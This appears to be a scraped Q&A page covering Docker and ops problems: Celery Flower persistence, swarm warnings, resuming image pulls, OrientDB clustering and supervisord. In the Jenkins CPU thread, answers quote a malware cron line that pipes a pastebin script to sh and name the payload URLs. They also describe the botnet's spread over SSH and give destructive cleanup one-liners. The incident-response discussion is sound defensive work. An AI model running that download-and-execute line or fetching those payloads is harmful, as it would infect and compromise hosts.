Flush Flower database occasionally and/or exit gracefully from Docker? - docker

I'm running Celery Flower in Docker (see this question for details). The command ends up being:
celery -A proj flower --persistent=True --db=/flower/flower
I've got a persistent volume all set up on /flower. However, it looks like Flower never writes anything to its database file, even after 30 minutes of uptime (during which ~120 tasks were processed):
-rw-r--r-- 1 user user 0 Mar 11 00:08 flower.bak
-rw-r--r-- 1 user user 0 Mar 10 23:29 flower.dat
-rw-r--r-- 1 user user 0 Mar 11 00:08 flower.dir
Stopping the Docker container gracefully doesn't work, and so Docker forcefully kills it, which means nothing ends up being written to the database and so it's as if nothing was persisted.
Is there a way to get Flower to either flush its database occasionally, or, better yet, to exit gracefully?

To flush out, you can set max_tasks to a suitable number.
celery -A proj flower --persistent=True --db=/flower/flower --max_tasks=100
This limits number of tasks that will be stored in the db. Once limit is reached, it will discard old tasks.
You can checkout docs for more configuration options.

There is no detail in the Flower document, but after checking the code, I found the only place it writes back to the db file is when Flower is stopped gracefully. This is the latest code (v0.9.2)1:
def stop(self):
if self.persistent:
logger.debug("Saving state to '%s'...", self.db)
state = shelve.open(self.db)
state['events'] = self.state
state.close()
This means you can do nothing on the Flower side, yet, unless you want to change the code.
However, on the Docker side, you may ensure that it graceful shutdown the container with docker container stop, so Flower's stop() function is invoked properly. To achieve this, you need to make sure your container command is using "exec form" over "shell form"2, as recommended in the document.
I also found a discussion over a similar problem with another service. Have a look there if you need more detailed explanation3.
Reference:
Flower code on Github
DockerFile CMD document
Discussion of a similar issue with SQL Server Docker on Github

Related

Get full text for warning in docker service update

When running the following command:
docker service update captain-captain --force
I am briefly seeing a warning:
no suitable node (scheduling constraints not satisfied on 2 nodes; host-mo…".
But I can't see the full text to understand this properly. Nor is there a task ID e.g. mqo2k39bax94y6fiq7boxxtge which I've seen in the past for similar warnings/errors, which I can inspect with docker inspect mqo2k39bax94y6fiq7boxxtge.
The warning does disappear after a short time and the update seems to complete OK, so it's clearly not fatal, but I want to understand a bit more about why it is showing in the first place.
The key was to add --detach to unblock the terminal (so that it doesn't wait for the task to finish):
docker service update captain-captain --force --detach
Then quickly (while the truncated message would still be showing had the terminal no been unblocked:
docker service ps captain-captain
ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS
1ejhe98ozrdn captain-captain.1 caprover/caprover:1.10.1 Ready Pending 2 seconds ago "no suitable node (host-mode p…"
o9y4cfwlsqy7 \_ captain-captain.1 caprover/caprover:1.10.1 mercian-31 Shutdown Running 2 seconds ago
Then quickly grab the ID of the task showing the error, and inspect it before the error is resolved:
docker inspect 1ejhe98ozrdn
Within that output you'll find the full error, in this case:
"Err": "no suitable node (scheduling constraints not satisfied on 2 nodes; host-mode port already in use on 1 node)"
Quite why docker can't just show the full error message in the first place, without having to just through these hoops, I'm not sure.
As an aside, docker seems not to be stopping the old instance before it schedules the new one even though we're definitely using stop-first.
Credit for this answer goes here.

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Docker. How to resume downloading image when interrupted?

How can I resume pull when disconnected? The pull process always start from the beginning every time I run docker pull some-image again after disconnected. My connection is so unstable that even downloading just a 100MB image take so long and almost fails every time. So, it is almost impossible for me to pull a bigger image. So, how can I resume the pull process?
Update:
The pull process will now automatically resume based on which layers have already been downloaded. This was implemented with https://github.com/moby/moby/pull/18353.
Old:
There is no resume feature yet. However there are discussions around this feature being implemented with docker's download manager.
Docker's code isn't as updated as the moby in development repository on github. People have been having issues for several years relating to this. I had tried to manually use several patches which aren't in the upstream yet, and none worked decent.
The github repository for moby (docker's development repo) has a script called download-frozen-image-v2.sh. This script uses bash, curl, and other things like JSON interpreters via command line. It will retrieve a docker token, and then download all of the layers to a local directory. You can then use 'docker load' to insert into your local docker installation.
It does not do well with resume though. It had some comment in the script relating to 'curl -C' isn't working. I had tracked down, and fixed this problem. I made a modification which uses a ".headers" file to retrieve initially, which has always returned a 302 while I've been monitoring, and then retrieves the final using curl (+ resume support) to the layer tar file. It also has to loop on the calling function which retrieves a valid token which unfortunately only lasts about 30 minutes.
It will loop this process until it receives a 416 stating that there is no resume possible since it's ranges have been fulfilled. It also verifies the size against a curl header retrieval. I have been able to retrieve all images necessary using this modified script. Docker has many more layers relating to retrieval, and has remote control processes (Docker client) which make it more difficult to control, and they viewed this issue as only affecting some people on bad connections.
I hope this script can help you as much as it has helped me:
Changes:
fetch_blob function uses a temporary file for its first connection. It then retrieves 30x HTTP redirect from this. It attempts a header retrieval on the final url and checks whether the local copy has the full file. Otherwise, it will begin a resume curl operation. The calling function which passes it a valid token has a loop surrounding retrieving a token, and fetch_blob which ensures the full file is obtained.
The only other variation is a bandwidth limit variable which can be set at the top, or via "BW:10" command line parameter. I needed this to allow my connection to be viable for other operations.
Click here for the modified script.
In the future it would be nice if docker's internal client performed resuming properly. Increasing the amount of time for the token's validation would help tremendously..
Brief views of change code:
#loop until FULL_FILE is set in fetch_blob.. this is for bad/slow connections
while [ "$FULL_FILE" != "1" ];do
local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress
sleep 1
done
Another section from fetch_blob:
while :; do
#if the file already exists.. we will be resuming..
if [ -f "$targetFile" ];then
#getting current size of file we are resuming
CUR=`stat --printf="%s" $targetFile`
#use curl to get headers to find content-length of the full file
LEN=`curl -I -fL "${curlArgs[#]}" "$blobRedirect"|grep content-length|cut -d" " -f2`
#if we already have the entire file... lets stop curl from erroring with 416
if [ "$CUR" == "${LEN//[!0-9]/}" ]; then
FULL_FILE=1
break
fi
fi
HTTP_CODE=`curl -w %{http_code} -C - --tr-encoding --compressed --progress-bar -fL "${curlArgs[#]}" "$blobRedirect" -o "$targetFile"`
if [ "$HTTP_CODE" == "403" ]; then
#token expired so the server stopped allowing us to resume, lets return without setting FULL_FILE and itll restart this func w new token
FULL_FILE=0
break
fi
if [ "$HTTP_CODE" == "416" ]; then
FULL_FILE=1
break
fi
sleep 1
done
Try this
ps -ef | grep docker
Get PID of all the docker pull command and do a kill -9 on them. Once killed, re-issue the docker pull <image>:<tag> command.
This worked for me!

OrientDB " Error on moving existent database"

I'm trying to setup OrientDB distributed configuration with docker. But I'm getting error when starting second node -
2015-10-09 17:14:14:066 WARNI
[node1444321499719]->[[node1444321392311]] requesting deploy of
database 'testDB' on local server... [OHazelcastPlugin] 2015-10-09
17:14:14:117 INFO [node1444321499719]<-[node1444321392311] received
updated status node1444321499719.testDB=SYNCHRONIZING
[OHazelcastPlugin] 2015-10-09 17:14:14:119 INFO
[node1444321499719]<-[node1444321392311] received updated status
node1444321392311.testDB=SYNCHRONIZING [OHazelcastPlugin] 2015-10-09
17:14:15:935 WARNI [node1444321499719] moving existent database
'testDB' located in '/orientdb/databases/testDB' to
'/orientdb/databases/../backup/databases/testDB' and get a fresh copy
from a remote node... [OHazelcastPlugin] 2015-10-09 17:14:15:936 SEVER
[node1444321499719] error on moving existent database 'testDB' located
in '/orientdb/databases/testDB' to
'/orientdb/databases/../backup/databases/testDB'. Try to move the
database directory manually and retry
[OHazelcastPlugin][node1444321499719] Error on starting distributed
plugin
com.orientechnologies.orient.server.distributed.ODistributedException:
Error on moving existent database 'testDB' located in
'/orientdb/databases/testDB' to
'/orientdb/databases/../backup/databases/testDB'. Try to move the
database directory manually and retry
at com.orientechnologies.orient.server.hazelcast.OHazelcastPlugin.backupCurrentDatabase(OHazelcastPlugin.java:1007)
at com.orientechnologies.orient.server.hazelcast.OHazelcastPlugin.requestDatabase(OHazelcastPlugin.java:954)
at com.orientechnologies.orient.server.hazelcast.OHazelcastPlugin.installDatabase(OHazelcastPlugin.java:893)
at com.orientechnologies.orient.server.hazelcast.OHazelcastPlugin.installNewDatabases(OHazelcastPlugin.java:1426)
at com.orientechnologies.orient.server.hazelcast.OHazelcastPlugin.startup(OHazelcastPlugin.java:184)
at com.orientechnologies.orient.server.OServer.registerPlugins(OServer.java:979)
at com.orientechnologies.orient.server.OServer.activate(OServer.java:346)
at com.orientechnologies.orient.server.OServerMain.main(OServerMain.java:41)
I don't have this error if I'm starting orientdb cluster without docker.
Also I can move it in container
[root#64f6cc1eba61 orientdb]# mv -v /orientdb/databases/testDB
/orientdb/databases/../backup/databases/testDB
'/orientdb/databases/testDB' ->
'/orientdb/databases/../backup/databases/testDB'
'/orientdb/databases/testDB/distributed-config.json' ->
'/orientdb/databases/../backup/databases/testDB/distributed-config.json'
removed '/orientdb/databases/testDB/distributed-config.json' removed
directory: '/orientdb/databases/testDB' [root#64f6cc1eba61 orientdb]#
ls -l /orientdb/databases/../backup/databases/testDB total 4
-rw-r--r--. 1 root root 455 Oct 9 11:32 distributed-config.json [root#64f6cc1eba61 orientdb]#
I'm using OrientDB version 2.1.3
This was reported and fixed:
https://github.com/orientechnologies/orientdb/issues/4891
Set the 'distributed.backupDirectory' variable to a specific directory and the issue should be gone.
By the way, running orient distributed in docker is our experience currently a no go:
- Docker does not support multicast yet, you can work around it, but it's painful. But the main problem:
- Docker doesn't reuse ip addresses on restart, so a container restart will give it a new ip address, this messes up your cluster big time.
We abandoned using orient distributed with docker until docker is fixed on both issues (I believe it is both on the roadmap).
If you experience otherwise, I'm happy to hear your thoughts.

Docker - Handling multiple services in a single container

I would like to start two different services in my Docker container and exit the container as soon as one of them exits. I looked at supervisor, but I can't find how to get it to quit as soon as one of the managed applications exits. It tries to restart them up to three times, as is the standard setting and then just sits there doing nothing. Is supervisor able to do this or is there any other tool for this? A bonus would be if there also was a way to let both managed programs write to stdout, tagged with their application name, e.g.:
[Program 1] Some output
[Program 2] Some other output
[Program 1] Output again
Since you asked if there was another tool... we designed and wrote a powerful replacement for supervisord that is designed specifically for Docker. It automatically terminates when all applications quit, as well as has special service settings to control this behavior, plus will redirect stdout with tagged syslog-compatible output lines as well. It's open source, and being used in production.
Here is a quick start for Docker: http://garywiz.github.io/chaperone/guide/chap-docker-simple.html
There is also a complete set of tested base-images which are a good example at: https://github.com/garywiz/chaperone-docker, but these might be overkill and the earlier quickstart may do the trick.
I found solutions to both of my requirements by reading through the docs some more.
Exit supervisord on application exit
This can be achieved by using a custom eventlistener. I had to add the following segment into my supervisord configuration file:
[eventlistener:shutdownevent]
command=/shutdownhandler.sh
events=PROCESS_STATE_EXITED
supervisord will start the referenced script and upon the given event being triggered (PROCESS_STATE_EXITED is triggered after the exit of one of the managed programs and it not restarting automatically) will send a line containing data about the event on the scripts stdin.
The referenced shutdownhandler-script contains:
#!/bin/bash
while :
do
echo -en "READY\n"
read line
kill $(cat /supervisord.pid)
echo -en "RESULT 2\nOK"
done
The script has to indicate being ready by sending "READY\n" on its stdout, after which it may receive an event data line on its stdin. For my use case upon receival of a line (meaning one of the managed programs has exited), a SIGTERM is sent to the supervisord process being found by the pid it leaves in its pid file (situated in the root directory by default). For technical completeness, I also included a positive answer for the eventlistener, though that one should never matter.
Tagged output on stdout
I did this by simply starting a tail process in the background before starting supervisord, tailing the programs output log and piping the lines through ts (from the moreutils package) to prepend a tag to it. This way it shows up via docker logs with an easy way to see which program actually wrote the line.
tail -fn0 /var/log/supervisor/program1.log | ts '[Program 1]' &

Resources